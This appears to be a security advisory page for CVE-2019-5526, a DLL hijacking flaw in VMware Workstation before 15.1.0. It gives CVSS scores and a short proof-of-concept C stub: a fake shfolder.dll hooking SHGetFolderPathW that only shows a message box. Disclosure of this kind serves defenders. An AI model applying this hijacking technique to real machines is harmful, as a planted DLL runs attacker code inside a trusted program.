VMware Workstation DLL Hijacking

2019.05.17
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#--------------------------------------------------------- # Title: VMware Workstation DLL hijacking < 15.1.0 # Date: 2019-05-14 # Author: Miguel Mendez Z. & Claudio Cortes C. # Team: www.exploiting.cl # Vendor: https://www.vmware.com # Version: VMware Workstation Pro / Player (Workstation) # Tested on: Windows Windows 7_x86/7_x64 [eng] # Cve: CVE-2019-5526 #--------------------------------------------------------- Description: VMware Workstation contains a DLL hijacking issue because some DLL. DLL Hijacking: shfolder.dll Hooking: SHGetFolderPathW() ------Code_Poc------- #include "dll.h" #include <windows.h> DLLIMPORT void SHGetFolderPathW() { MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION); exit(0); } -------------------------- https://www.vmware.com/security/advisories/VMSA-2019-0007.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top